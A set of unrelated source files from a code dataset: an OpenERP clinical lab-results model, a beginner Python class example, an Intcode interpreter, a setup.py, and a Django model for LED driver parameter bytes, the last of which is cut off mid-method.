fields\r\nfrom openerp import tools\r\n\r\nclass followuppartner_labresults(osv.Model):\r\n _name = \"followuppartner.labresults\"\r\n _columns = {\r\n 'visit_date':fields.date('Visit Date:'),\r\n 'partner_id': fields.many2one('res.partner', 'Sceening ID'),\r\n 'sceening_id': fields.char(string=\"Screening ID\", related='partner_id.name'),\r\n 'speccoldate':fields.date('Specimen collection date:'),\r\n 'hiv_negative':fields.boolean('A. Negative'),\r\n 'hiv_positive':fields.boolean('B. Positive'),\r\n 'hiv_indeterminate':fields.boolean('C. Indeterminate'),\r\n 'eia_negative':fields.boolean('A. Negative'),\r\n 'eia_positive':fields.boolean('B. Positive'),\r\n 'eia_indeterminate':fields.boolean('C. Indeterminate'),\r\n 'mensdate':fields.date('3. Date of last menstrual period:'),\r\n 'dont_know':fields.boolean('Don\\'t Know'),\r\n 'partpregnant':fields.selection([('1','Yes'),('2',\"No\")],\"4. Is the participant pregnant?\"),\r\n 'already_reported':fields.boolean(\"Already reported\"),\r\n 'reported_date':fields.date('Reported at visit'),\r\n 'breastfeeding':fields.selection([('1',('Yes')),('2','No')],\"5. Is the participant breastfeeding?\"),\r\n 'specimendate':fields.date('6. Specimen collection date:'),\r\n 'creatinine':fields.float('7. Creatinine:'),\r\n 'creatgrade':fields.integer(\"a. Creatinine grade (0-4)\"),\r\n 'adversevnt':fields.selection([('yes','Yes'),('no','No')],'b. Is this an adverse event?'),\r\n 'reltomed':fields.selection([('1','Definitely related '),('2','Probably related'),('3','Possibly related'),('4','Probably not related'),('5','pending')],\"c. Relationship to study medication:\"),\r\n 'creatinine_clear':fields.float('8. Creatinine clearance:'),\r\n } \r\n","sub_path":"followup_partner_followup_lab_results/followup_partner_followup_lab_results.py","file_name":"followup_partner_followup_lab_results.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"250300334","text":"# Classes Variables: dict command\n\nclass Employee:\n\n raise_amount = 1.04\n\n def __init__(self, first, last, pay):\n self.first = first\n self.last = last\n self.pay = pay\n self.email = first + '.' + last + '@company.com'\n \n def fullname(self):\n return '{} {}'.format(self.first, emp_1.last)\n\n def apply_raise(self):\n self.pay = int(self.pay * self.raise_amount)\n\n\nemp_1 = Employee('Corey', 'Schafer', 50000)\nemp_2 = Employee('Test', 'User', 60000)\n\n# __dict__ command allows to see all characteristics / attributes of emp_1 (in other words its namespace)\nprint(emp_1.__dict__)\n\n# Prints out different attributes (class variables) of Employee class\nprint(Employee.__dict__)\n\n","sub_path":"Fundamentals/9 Object-Oriented Programming/2 Class Variables/2.1.3.py","file_name":"2.1.3.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"547410252","text":"def run(codes):\n opCodeIndex = 0\n while True:\n opCode = codes[opCodeIndex]\n modes = processOpCode(opCode)\n operation = modes[3:]\n if operation == [9, 9]: # Halt\n return codes\n codeLength = executeOp(codes, modes, operation, opCodeIndex)\n opCodeIndex += codeLength\n\n\ndef processOpCode(opCode):\n modes = [int(num) for num in str(opCode)]\n while len(modes) < 5:\n modes.insert(0, 0)\n return modes\n\ndef executeOp(codes, modes, operation, opCodeIndex):\n #Returns how far the instruction ptr needs to travel\n param1 = codes[opCodeIndex + 1]\n param2 = codes[opCodeIndex + 2]\n param3 = codes[opCodeIndex + 3]\n\n if operation == [0, 1]: # Add\n add(codes, param1, param2, param3, modes)\n return 4\n elif operation == [0, 2]: # Multiply\n multiply(codes, param1, param2, param3, modes)\n return 4\n elif operation == [0, 3]: # Store input at address\n codes[param1] = 1 # input?\n return 2\n elif operation == [0, 4]: # Output element at address\n print(codes[param1])\n return 2\n else:\n print(\"ERROR: \" + str(codes[opCodeIndex]))\n return\n\ndef add(codes, param1, param2, param3, modes):\n mode1 = modes[2]\n mode2 = modes[1]\n num1, num2 = None, None\n\n if mode1 == 0:\n num1 = codes[param1]\n elif mode1 == 1:\n num1 = param1\n\n if mode2 == 0:\n num2 = codes[param2]\n elif mode2 == 1:\n num2 = param2\n\n codes[param3] = num1 + num2\n\ndef multiply(codes, param1, param2, param3, modes):\n mode1 = modes[2]\n mode2 = modes[1]\n num1, num2 = None, None\n\n if mode1 == 0:\n num1 = codes[param1]\n elif mode1 == 1:\n num1 = param1\n\n if mode2 == 0:\n num2 = codes[param2]\n elif mode2 == 1:\n num2 = param2\n\n codes[param3] = num1 * num2\n\nif __name__ == \"__main__\":\n with open(\"input.txt\", 'r') as myfile:\n input = myfile.read()\n originalCodes = [int(num) for num in input.split(',')]\n finalCodes = run(originalCodes)\n\n\n\n\n\n\n","sub_path":"5.1/5.1.py","file_name":"5.1.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"566303128","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='SchedulingPackage',\n version='0.0.1',\n author='Steven Verwerft',\n author_email='steven.verwerft@uantwerpen.be',\n description='A dummy project developed for the Uantwerp doctoral course \\'Optimization with Metaheuristics\\'' \n 'the package contains code for instance generation, a tabu search solver, and a racing algorithm.',\n long_description=long_description,\n url='http://github.com/StevenVerwerft/scheduling_package',\n packages=setuptools.find_packages(),\n classifiers=[\"Programming Language :: Python :: 3\",\n \"Operating System :: Darwin, Win32\"],\n)\n","sub_path":"scheduling_package/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"595129455","text":"from pathlib import Path\nfrom django.db import models\nfrom . import fields\n# from django.core.validators import MinValueValidator, MaxValueValidator\n\n# * Help functions\n\n\ndef split_2b(twobyte):\n \"\"\" split a 16 bit integer number (<=65535) into two 8 bit integers (<=255) \"\"\"\n lsb = twobyte % 256\n msb = twobyte // 256\n return [str(lsb), str(msb)]\n\n\ndef merge_2b(lsb, msb):\n \"\"\" merge two 8 bit integer numbers (<=255) into one 16 bit integer number (<=65535) \"\"\"\n twobyte = int(lsb) + 256 * int(msb)\n return twobyte\n\n\n# * Create your models here.\n\n\nclass Parameter(models.Model):\n \"\"\"\n Non integer information:\n - short_name: short name for the parameter file (max_length = 50)\n - csv_name: file name of the csv file (max_length = 60)\n - category: OMNI/SafeLED/SafeSign/...\n\n Integer information:\n Holds bytes that are described in documentation with short names:\n - Bytes 0-127: all 0xFF\n - Bytes 128-215: describted in this model\n - Bytes 216-255: all 0xFF\n * SIDENOTE/TODO on last block -> 220-221 found to be populated: WHAT IS THIS?\n \"\"\"\n\n @ classmethod\n def upload_file(cls, path, category=None):\n \"\"\" create a DB entry based on a file path \"\"\"\n with open(path) as file:\n lines = file.readlines()\n data = []\n for line in lines:\n if \";\" in line:\n if len(line.split(\";\")) == 257:\n data = line.split(\";\")\n if isinstance(data, list) and len(data) == 257:\n temp = cls()\n temp.csv_name = path.name\n temp.short_name = data[0]\n temp.category = category\n del data[0]\n data = list(map(int, data))\n temp.load_params_from_256_list(data)\n return temp\n else:\n raise AttributeError(\"data parsed is not right format\")\n\n @ classmethod\n def upload_string(cls, string, csv_name, category=None):\n \"\"\" create a DB entry based on a stream/string \"\"\"\n delim = \";\" if \";\" in string else \",\"\n temp = string.rstrip().split(delim)\n ret = cls()\n ret.csv_name = csv_name\n ret.short_name = temp[0]\n del temp[0]\n ret.category = category\n temp = list(map(int, temp))\n ret.load_params_from_256_list(temp)\n return ret\n\n # * NON INTEGER FIELDS\n short_name = models.CharField(max_length=50, default=\"default\")\n csv_name = models.CharField(\n max_length=60, default=\"default.csv\", unique=True)\n cat_choices = [\n (\"OMNI\", \"Omnidirectional range application\"),\n (\"SL\", \"SafeLED application\"),\n (\"Sign\", \"SafeSign application\"),\n ]\n category = models.CharField(\n max_length=50, choices=cat_choices, blank=True, null=True, default=None)\n\n # * INTEGER FIELDS\n # /i led settings parameters\n nominal_voltage_1b = fields.OneByteField() # - byte 139\n # ! nominal_voltage_1b * 100 mV\n nominal_current_2b = fields.TwoByteField() # - byte 137 (LSB), byte 138 (MSB)\n number_of_leds_1b = fields.OneByteField() # - byte 145\n led_revision_1b = fields.OneByteField(default=0) # - byte 146\n # ! LED revision 0: shortLED not mounted, LED revision 1: shortLED mounted\n min_lin_dim_2b = fields.TwoByteField(\n default=300) # - byte 202 (LSB), byte 203 (MSB)\n digital_dim_freq_2b = fields.TwoByteField(\n default=610) # - byte 204 (LSB), byte 205 (MSB)\n min_on_time_2b = fields.TwoByteField() # - byte 208 (LSB), byte 209 (MSB)\n # ! used in real life? meant for HPC according to docs?\n nominal_voltage_2b = fields.TwoByteField() # - byte 210 (LSB), byte 211 (MSB)\n # ! nominal_voltage_2b * 10 mV, also used for voltage control in HPC!\n load_type_1b = fields.OneByteField() # - byte 212\n # ! 255 - constant current application, 254 - sign application (constant voltage)\n dual_mon_1b = fields.OneByteField() # - byte 215\n # ! for HPC, if 255 channels act independent of each other on fautlts, if 1 they act together as one\n\n # /i dimming curve paramters\n dimming_curve_14_2b = fields.TwoByteField() # - byte 147 (LSB), byte 148 (MSB)\n dimming_curve_28_2b = fields.TwoByteField() # - byte 149 (LSB), byte 150 (MSB)\n dimming_curve_34_2b = fields.TwoByteField() # - byte 151 (LSB), byte 152 (MSB)\n dimming_curve_41_2b = fields.TwoByteField() # - byte 153 (LSB), byte 154 (MSB)\n dimming_curve_48_2b = fields.TwoByteField() # - byte 155 (LSB), byte 156 (MSB)\n dimming_curve_52_2b = fields.TwoByteField() # - byte 157 (LSB), byte 158 (MSB)\n dimming_curve_55_2b = fields.TwoByteField() # - byte 159 (LSB), byte 160 (MSB)\n dimming_curve_66_2b = fields.TwoByteField() # - byte 161 (LSB), byte 162 (MSB)\n\n # /i flux compensation curve parameters\n flux_comp_m25_1b = fields.OneByteField() # - byte 163\n flux_comp_0_1b = fields.OneByteField() # - byte 164\n flux_comp_25_1b = fields.OneByteField() # - byte 165\n flux_comp_50_1b = fields.OneByteField() # - byte 166\n flux_comp_75_1b = fields.OneByteField() # - byte 167\n flux_comp_max_1b = fields.OneByteField() # - byte 168\n\n # /i artic kit parameters\n ak_power_1window_1b = fields.OneByteField() # - byte 213\n ak_power_2window_1b = fields.OneByteField() # - byte 214\n\n # /i release info parameters\n rel_year_1b = fields.OneByteField(default=20) # - byte 128\n rel_week_1b = fields.OneByteField(default=43) # - byte 129\n rel_ver_1b = fields.OneByteField(default=1) # - byte 130\n rel_not_used_1b = fields.OneByteField(default=0) # - byte 131\n inv_rel_year_1b = fields.OneByteField(default=235) # - byte 132\n inv_rel_week_1b = fields.OneByteField(default=212) # - byte 133\n inv_rel_ver_1b = fields.OneByteField(default=254) # - byte 134\n inv_rel_not_used_1b = fields.OneByteField(default=255) # - byte 135\n # ! default to moment of making this file, just for fucking fun\n\n # /i programming data parameters\n year_1b = fields.OneByteField(default=20) # - byte 171\n month_1b = fields.OneByteField(default=10) # - byte 172\n day_1b = fields.OneByteField(default=23) # - byte 173\n hour_1b = fields.OneByteField(default=23) # - byte 174\n # ! default to moment of making this file, just for fucking fun\n\n # /i general/useless parameters\n type_1b = fields.OneByteField(default=1) # - byte 136\n # ! default to value 1\n thermal_resistance_1b = fields.OneByteField(default=10) # - byte 140\n # ! used as thermal resistance between LED measurement and LED junction\n max_junction_temp_1b = fields.OneByteField(default=130) # - byte 141\n flux_bin_info_1b = fields.OneByteField(default=180) # - byte 142\n color_1b = fields.OneByteField(default=156) # - byte 143\n # ! 4nm per increment, useless (not used)\n fitting_type_1b = fields.OneByteField(default=1) # - byte 144\n\n # /i depreciated/not-implemented parameters\n led_pwm_l1_b2 = fields.TwoByteField() # - byte 175 (LSB), byte 176 (MSB)\n led_pwm_l2_b2 = fields.TwoByteField() # - byte 177 (LSB), byte 178 (MSB)\n led_pwm_l3_b2 = fields.TwoByteField() # - byte 179 (LSB), byte 180 (MSB)\n led_pwm_l4_b2 = fields.TwoByteField() # - byte 181 (LSB), byte 182 (MSB)\n led_pwm_l5_b2 = fields.TwoByteField() # - byte 183 (LSB), byte 184 (MSB)\n led_pwm_l6_b2 = fields.TwoByteField() # - byte 185 (LSB), byte 186 (MSB)\n u_led_vl1_b2 = fields.TwoByteField() # - byte 187 (LSB), byte 188 (MSB)\n u_led_vl2_b2 = fields.TwoByteField() # - byte 189 (LSB), byte 190 (MSB)\n u_led_vl3_b2 = fields.TwoByteField() # - byte 191 (LSB), byte 192 (MSB)\n u_led_vl4_b2 = fields.TwoByteField() # - byte 193 (LSB), byte 194 (MSB)\n u_led_vl5_b2 = fields.TwoByteField() # - byte 195 (LSB), byte 196 (MSB)\n u_led_vl6_b2 = fields.TwoByteField() # - byte 197 (LSB), byte 198 (MSB)\n\n # /i CRC parameters\n # TODO: ask/look around for algorithm to try to calculate yourself from inputs of other fields?\n crc_2b = fields.TwoByteField() # - byte 199 (LSB), byte 200 (MSB)\n # ! based on bytes 128-198\n\n # /i unknown parameters?\n reserved_version_2b = fields.TwoByteField(\n default=0) # - byte 169 (LSB), byte 170 (MSB)\n length_block1_1b = fields.OneByteField(default=18) # - byte 201\n vf_short_threshold_fast = fields.OneByteField() # - byte 206\n vf_short_threshold_slow = fields.OneByteField() # - byte 207\n\n def update_dimming_curve(self, dimlist):\n self.dimming_curve_14_2b = dimlist[0]\n self.dimming_curve_28_2b = dimlist[1]\n self.dimming_curve_34_2b = dimlist[2]\n self.dimming_curve_41_2b = dimlist[3]\n self.dimming_curve_48_2b = dimlist[4]\n self.dimming_curve_52_2b = dimlist[5]\n self.dimming_curve_55_2b = dimlist[6]\n self.dimming_curve_66_2b = dimlist[7]\n\n @ property\n def dimming_curve(self):\n ret = [self.dimming_curve_14_2b, self.dimming_curve_28_2b, self.dimming_curve_34_2b, self.dimming_curve_41_2b,\n self.dimming_curve_48_2b, self.dimming_curve_52_2b, self.dimming_curve_55_2b, self.dimming_curve_66_2b]\n return ret\n\n def update_full_flux(self, flux):\n self.flux_comp_m25_1b = flux\n self.flux_comp_0_1b = flux\n self.flux_comp_25_1b = flux\n self.flux_comp_50_1b = flux\n self.flux_comp_75_1b = flux\n self.flux_comp_max_1b = flux\n\n @ property\n def flux_analysis(self):\n ret = self.flux_comp_m25_1b if self.flux_comp_m25_1b == self.flux_comp_0_1b == self.flux_comp_25_1b == self.flux_comp_50_1b == self.flux_comp_75_1b == self.flux_comp_max_1b else \"Varying!\"\n return ret\n\n def update_nominal_voltage(self, volt):\n \"\"\" volt is in (V) unit, whether to use 1 byte field or 2 byte field is autodetected \"\"\"\n if volt <= 25.5:\n self.nominal_voltage_1b = round(volt * 10)\n self.nominal_voltage_2b = 65535\n else:\n self.nominal_voltage_1b = 255\n self.nominal_voltage_2b = round(volt * 100)\n\n @ property\n def real_nom_voltage(self):\n if self.nominal_voltage_2b == 65535:\n return self.nominal_voltage_1b / 10\n else:\n return self.nominal_voltage_2b / 100\n\n def _get_full_file(self):\n release_info = [self.rel_year_1b, self.rel_week_1b, self.rel_ver_1b, self.rel_not_used_1b,\n self.inv_rel_year_1b, self.inv_rel_week_1b, self.inv_rel_ver_1b, self.inv_rel_not_used_1b]\n dimming_curve = split_2b(self.dimming_curve_14_2b) + split_2b(self.dimming_curve_28_2b) + split_2b(self.dimming_curve_34_2b) + split_2b(self.dimming_curve_41_2b) + \\\n split_2b(self.dimming_curve_48_2b) + split_2b(self.dimming_curve_52_2b) + \\\n split_2b(self.dimming_curve_55_2b) + \\\n split_2b(self.dimming_curve_66_2b)\n flux_comp = [self.flux_comp_m25_1b, self.flux_comp_0_1b, self.flux_comp_25_1b,\n self.flux_comp_50_1b, self.flux_comp_75_1b, self.flux_comp_max_1b]\n programming_date = [self.year_1b,\n self.month_1b, self.day_1b, self.hour_1b]\n depr1 = split_2b(self.led_pwm_l1_b2) + split_2b(self.led_pwm_l2_b2) + split_2b(self.led_pwm_l3_b2) + \\\n split_2b(self.led_pwm_l4_b2) + split_2b(self.led_pwm_l5_b2) + \\\n split_2b(self.led_pwm_l6_b2)\n depr2 = split_2b(self.u_led_vl1_b2) + split_2b(self.u_led_vl2_b2) + split_2b(self.u_led_vl3_b2) + \\\n split_2b(self.u_led_vl4_b2) + split_2b(self.u_led_vl5_b2) + \\\n split_2b(self.u_led_vl6_b2)\n full = [self.short_name] + [255] * 128 + release_info + [self.type_1b] + split_2b(self.nominal_current_2b) + [self.nominal_voltage_1b] + [self.thermal_resistance_1b] + [self.max_junction_temp_1b] + [\n self.flux_bin_info_1b] + [self.color_1b] + [self.fitting_type_1b] + [self.number_of_leds_1b] + [self.led_revision_1b] + dimming_curve + flux_comp + split_2b(self.reserved_version_2b) + programming_date + depr1 + depr2 + split_2b(self.crc_2b) + [self.length_block1_1b] + split_2b(self.min_lin_dim_2b) + split_2b(self.digital_dim_freq_2b) + [\n self.vf_short_threshold_fast] + [self.vf_short_threshold_slow] + split_2b(self.min_on_time_2b) + split_2b(self.nominal_voltage_2b) + [self.load_type_1b] + [self.ak_power_1window_1b] + [self.ak_power_2window_1b] + [self.dual_mon_1b] + [255] * 40\n return full\n\n def create_file(self, target_dir):\n output = [str(e) for e in self._get_full_file()]\n full_path = Path(target_dir, self.csv_name).resolve()\n with open(full_path, \"w\") as f:\n f.write(\";\".join(output)) # - SEMICOLON!!!!\n f.write(\"\\n\")\n return full_path\n\n def get_relevent_list(self):\n temp = [int(e) for e in self._get_full_file()[129:217]]\n keys = list(range(128, 216, 1))\n print(len(temp), len(keys))\n ret = dict(zip(keys, temp))\n ret[\"csv_name\"] = self.csv_name\n ret[\"short_name\"] = self.short_name\n ret[\"category\"] = self.category\n return ret\n\n def __str__(self):\n return self.short_name\n\n def load_params_from_256_list(self, l):\n self.rel_year_1b = l[128]\n self.rel_week_1b = l[129]\n self.rel_ver_1b = l[130]\n self.rel_not_used_1b = l[131]\n self.inv_rel_year_1b = l[132]\n self.inv_rel_week_1b = l[133]\n self.inv_rel_ver_1b = l[134]\n self.inv_rel_not_used_1b = l[135]\n self.type_1b = l[136]\n self.nominal_current_2b = merge_2b(l[137], l[138])\n self.nominal_voltage_1b = l[139]\n self.thermal_resistance_1b = l[140]\n self.max_junction_temp_1b = l[141]\n self.flux_bin_info_1b = l[142]\n self.color_1b = l[143]\n self.fitting_type_1b = l[144]\n self.number_of_leds_1b = l[145]\n self.led_revision_1b = l[146]\n self.dimming_curve_14_2b = merge_2b(l[147], l[148])\n self.dimming_curve_28_2b = merge_2b(l[149], l[150])\n self.dimming_curve_34_2b = merge_2b(l[151], l[152])\n self.dimming_curve_41_2b = merge_2b(l[153], l[154])\n self.dimming_curve_48_2b = merge_2b(l[155], l[156])\n self.dimming_curve_52_2b = merge_2b(l[157], l[158])\n self.dimming_curve_55_2b = merge_2b(l[159], l[160])\n self.dimming_curve_66_2b = merge_2b(l[161], l[162])\n self.flux_comp_m25_1b = l[163]\n self.flux_comp_0_1b = l[164]\n self.flux_comp_25_1b = l[165]\n self.flux_comp_50_1b = l[166]\n self.flux_comp_75_1b = l[167]\n self.flux_comp_max_1b = l[168]\n self.reserved_version_2b = merge_2b(l[169], l[170])\n self.year_1b = l[171]\n self.month_1b = l[172]\n self.day_1b = l[173]\n self.hour_1b = l[174]\n self.led_pwm_l1_b2 = merge_2b(l[175], l[176])\n self.led_pwm_l2_b2 = merge_2b(l[177], l[178])\n self.led_pwm_l3_b2 = merge_2b(l[179], l[180])\n self.led_pwm_l4_b2 = merge_2b(l[181], l[182])\n self.led_pwm_l5_b2 = merge_2b(l[183], l[184])\n self.led_pwm_l6_b2 = merge_2b(l[185], l[186])\n self.u_led_vl1_b2 = merge_2b(l[187], l[188])\n self.u_led_vl2_b2 = merge_2b(l[189], l[190])\n self.u_led_vl3_b2 = merge_2b(l[191], l[192])\n self.u_led_vl4_b2 = merge_2b(l[193], l[194])\n self.u_led_vl5_b2 = merge_2b(l[195], l[196])\n self.u_led_vl6_b2 = merge_2b(l[197], l[198])\n self.crc_2b = merge_2b(l[199], l[200])\n self.length_block1_1b = l[201]\n self.min_lin_dim_2b = merge_2b(l[202], l[203])\n self.digital_dim_freq_2b = merge_2b(l[204], l[205])\n self.vf_short_threshold_fast = l[206]\n self.vf_short_threshold_slow = l[207]\n self.min_on_time_2b = merge_2b(l[208], l[209])\n self.nominal_voltage_2b = merge_2b(l[210], l[211])\n self.load_type_1b = l[212]\n self.ak_power_1window_1b = l[213]\n self.ak_power_2window_1b = l[214]\n self.dual_mon_1b = l[215]\n\n def get_four_way_tuple(self):\n ret = []\n colors = {\"relprog\": \"#e95b0b\", \"led\": \"#ed7103\",\n \"dimming\": \"#f8b123\", \"flux\": \"#e8b135\", \"varia\": \"#f49b01\"}\n ret.append((\"Rel year\", \"128\", self.rel_year_1b, colors[\"relprog\"]))\n ret.append((\"Rel week\", \"129\", self.rel_week_1b, colors[\"relprog\"]))\n ret.append((\"Rel version\", \"130\", self.rel_ver_1b, colors[\"relprog\"]))\n ret.append((\"Rel not used\", \"131\", self.rel_not_used_1b,\n colors[\"relprog\"]))\n ret.append((\"Rel year inv\", \"132\", self.inv_rel_year_1b,\n colors[\"relprog\"]))\n ret.append((\"Rel week inv\", \"133\", self.inv_rel_week_1b,\n colors[\"relprog\"]))\n ret.append((\"Rel version inv\", \"134\", self.inv_rel_ver_1b,\n colors[\"relprog\"]))\n ret.append((\"Rel not used inv\", \"135\",\n self.inv_rel_not_used_1b, colors[\"relprog\"]))\n ret.append((\"Type\", \"136\", self.type_1b, colors[\"varia\"]))\n ret.append((\"Nom current (mA)\", \"137 & 138\",\n self.nominal_current_2b, colors[\"led\"]))\n ret.append((\"Nom voltage (x100mV) (1b)\", \"139\",\n self.nominal_voltage_1b, colors[\"led\"]))\n ret.append((\"Therm res (°C/W)\", \"140\",\n self.thermal_resistance_1b, colors[\"varia\"]))\n ret.append((\"Max junc temp (°C)\", \"141\",\n self.max_junction_temp_1b, colors[\"varia\"]))\n ret.append((\"Flux bin info\", \"142\", self.flux_bin_info_1b,\n colors[\"varia\"]))\n ret.append((\"Color\", \"143\", self.color_1b, colors[\"varia\"]))\n ret.append((\"Fitting type\", \"144\", self.fitting_type_1b,\n colors[\"varia\"]))\n ret.append((\"Number of LEDs\", \"145\",\n self.number_of_leds_1b, colors[\"led\"]))\n ret.append((\"LED revision\", \"146\", self.led_revision_1b,\n colors[\"led\"]))\n ret.append((\"DC 1.4A (mA)\", \"147 & 148\",\n self.dimming_curve_14_2b, colors[\"dimming\"]))\n ret.append((\"DC 2.8A (mA)\", \"149 & 150\",\n self.dimming_curve_28_2b, colors[\"dimming\"]))\n ret.append((\"DC 3.4A (mA)\", \"151 & 152\",\n self.dimming_curve_34_2b, colors[\"dimming\"]))\n ret.append((\"DC 4.1A (mA)\", \"153 & 154\",\n self.dimming_curve_41_2b, colors[\"dimming\"]))\n ret.append((\"DC 4.8A (mA)\", \"155 & 156\",\n self.dimming_curve_48_2b, colors[\"dimming\"]))\n ret.append((\"DC 5.2A (mA)\", \"157 & 158\",\n self.dimming_curve_52_2b, colors[\"dimming\"]))\n ret.append((\"DC 5.5A (mA)\", \"159 & 160\",\n self.dimming_curve_55_2b, colors[\"dimming\"]))\n ret.append((\"DC 6.6A (mA)\", \"161 & 162\",\n self.dimming_curve_66_2b, colors[\"dimming\"]))\n ret.append((\"Flux comp m25°C (%)\", \"163\",\n self.flux_comp_m25_1b, colors[\"flux\"]))\n ret.append((\"Flux comp 0°C (%)\", \"164\",\n self.flux_comp_0_1b, colors[\"flux\"]))\n ret.append((\"Flux comp 25°C (%)\", \"165\",\n self.flux_comp_25_1b, colors[\"flux\"]))\n ret.append((\"Flux comp 50°C (%)\", \"166\",\n self.flux_comp_50_1b, colors[\"flux\"]))\n ret.append((\"Flux comp 75°C (%)\", \"167\",\n self.flux_comp_75_1b, colors[\"flux\"]))\n ret.append((\"Flux comp Max (%)\", \"168\",\n self.flux_comp_max_1b, colors[\"flux\"]))\n ret.append((\"Reserved version\", \"169 & 170\",\n self.reserved_version_2b, colors[\"varia\"]))\n ret.append((\"Prog year\", \"171\", self.year_1b, colors[\"relprog\"]))\n ret.append((\"Prog month\", \"172\", self.month_1b, colors[\"relprog\"]))\n ret.append((\"Prog date\", \"173\", self.day_1b, colors[\"relprog\"]))\n ret.append((\"Prog hour\", \"174\", self.hour_1b, colors[\"relprog\"]))\n ret.append((\"LED PWM level 1\", \"175 & 176\",\n self.led_pwm_l1_b2, colors[\"varia\"]))\n ret.append((\"LED PWM level 2\", \"177 & 178\",\n self.led_pwm_l2_b2, colors[\"varia\"]))\n ret.append((\"LED PWM level 3\", \"179 & 180\",\n self.led_pwm_l3_b2, colors[\"varia\"]))\n ret.append((\"LED PWM level 4\", \"181 & 182\",\n self.led_pwm_l4_b2, colors[\"varia\"]))\n ret.append((\"LED PWM level 5\", \"183 & 184\",\n self.led_pwm_l5_b2, colors[\"varia\"]))\n ret.append((\"LED PWM level 6\", \"185 & 186\",\n self.led_pwm_l6_b2, colors[\"varia\"]))\n ret.append((\"U LED level 1\", \"187 & 188\",\n self.u_led_vl1_b2, colors[\"varia\"]))\n ret.append((\"U LED level 2\", \"189 & 190\",\n self.u_led_vl2_b2, colors[\"varia\"]))\n ret.append((\"U LED level 3\", \"191 & 192\",\n self.u_led_vl3_b2, colors[\"varia\"]))\n ret.append((\"U LED level 4\", \"193 & 194\",\n self.u_led_vl4_b2, colors[\"varia\"]))\n ret.append((\"U LED level 5\", \"195 & 196\",\n self.u_led_vl5_b2, colors[\"varia\"]))\n ret.append((\"U LED level 6\", \"197 & 198\",\n self.u_led_vl6_b2, colors[\"varia\"]))\n ret.append((\"CRC\", \"199 & 200\", self.crc_2b, colors[\"varia\"]))\n ret.append((\"Length block 1\", \"201\", self.length_block1_1b,\n colors[\"varia\"]))\n ret.append((\"Min lin dim (mA)\", \"202 & 203\",\n self.min_lin_dim_2b, colors[\"led\"]))\n ret.append((\"Dig dim freq (Hz)\", \"204 & 205\",\n self.digital_dim_freq_2b, colors[\"led\"]))\n ret.append((\"Vf treshold fast\", \"206\",\n self.vf_short_threshold_fast, colors[\"varia\"]))\n ret.append((\"Vf threshold slow\", \"207\",\n self.vf_short_threshold_slow, colors[\"varia\"]))\n ret.append((\"Min on time (ns)\", \"208 & 209\",\n self.min_on_time_2b, colors[\"varia\"]))\n ret.append((\"Nom voltage (x10mV)\", \"210 & 211\",\n self.nominal_voltage_2b, colors[\"led\"]))\n ret.append((\"Load type\", \"212\", self.load_type_1b, colors[\"led\"]))\n ret.append((\"AK power 1 win (W)\", \"213\",\n self.ak_power_1window_1b, colors[\"varia\"]))\n ret.append((\"AK power 2 win (W)\", \"214\",\n self.ak_power_2window_1b, colors[\"varia\"]))\n ret.append((\"Dual monitoring\", \"215\", self.dual_mon_1b, colors[\"led\"]))\n return ret\n\n def update_data_without_save(self, update):\n self.rel_year_1b = update[\"Relyear\"]\n self.rel_week_1b = update[\"Relweek\"]\n self.rel_ver_1b = update[\"Relversion\"]\n self.rel_not_used_1b = update[\"Relnotused\"]\n self.inv_rel_year_1b = update[\"Relyearinv\"]\n self.inv_rel_week_1b = update[\"Relweekinv\"]\n self.inv_rel_ver_1b = update[\"Relversioninv\"]\n self.inv_rel_not_used_1b = update[\"Relnotusedinv\"]\n self.type_1b = update[\"Type\"]\n self.nominal_current_2b = update[\"NomcurrentmA\"]\n self.nominal_voltage_1b = update[\"Nomvoltagex100mV1b\"]\n self.thermal_resistance_1b = update[\"ThermresCW\"]\n self.max_junction_temp_1b = update[\"MaxjunctempC\"]\n self.flux_bin_info_1b = update[\"Fluxbininfo\"]\n self.color_1b = update[\"Color\"]\n self.fitting_type_1b = update[\"Fittingtype\"]\n self.number_of_leds_1b = update[\"NumberofLEDs\"]\n self.led_revision_1b = update[\"LEDrevision\"]\n self.dimming_curve_14_2b = update[\"DC14AmA\"]\n self.dimming_curve_28_2b = update[\"DC28AmA\"]\n self.dimming_curve_34_2b = update[\"DC34AmA\"]\n self.dimming_curve_41_2b = update[\"DC41AmA\"]\n self.dimming_curve_48_2b = update[\"DC48AmA\"]\n self.dimming_curve_52_2b = update[\"DC52AmA\"]\n self.dimming_curve_55_2b = update[\"DC55AmA\"]\n self.dimming_curve_66_2b = update[\"DC66AmA\"]\n self.flux_comp_m25_1b = update[\"Fluxcompm25C\"]\n self.flux_comp_0_1b = update[\"Fluxcomp0C\"]\n self.flux_comp_25_1b = update[\"Fluxcomp25C\"]\n self.flux_comp_50_1b = update[\"Fluxcomp50C\"]\n self.flux_comp_75_1b = update[\"Fluxcomp75C\"]\n self.flux_comp_max_1b = update[\"FluxcompMax\"]\n self.reserved_version_2b = update[\"Reservedversion\"]\n self.year_1b = update[\"Progyear\"]\n self.month_1b = update[\"Progmonth\"]\n self.day_1b = update[\"Progdate\"]\n self.hour_1b = update[\"Proghour\"]\n self.led_pwm_l1_b2 = update[\"LEDPWMlevel1\"]\n self.led_pwm_l2_b2 = update[\"LEDPWMlevel2\"]\n self.led_pwm_l3_b2 = update[\"LEDPWMlevel3\"]\n self.led_pwm_l4_b2 = update[\"LEDPWMlevel4\"]\n self.led_pwm_l5_b2 = update[\"LEDPWMlevel5\"]\n self.led_pwm_l6_b2 = update[\"LEDPWMlevel6\"]\n self.u_led_vl1_b2 = update[\"ULEDlevel1\"]\n self.u_led_vl2_b2 = update[\"ULEDlevel2\"]\n self.u_led_vl3_b2 = update[\"ULEDlevel3\"]\n self.u_led_vl4_b2 = update[\"ULEDlevel4\"]\n self.u_led_vl5_b2 = update[\"ULEDlevel5\"]\n self.u_led_vl6_b2 = update[\"ULEDlevel6\"]\n self.crc_2b = update[\"CRC\"]\n 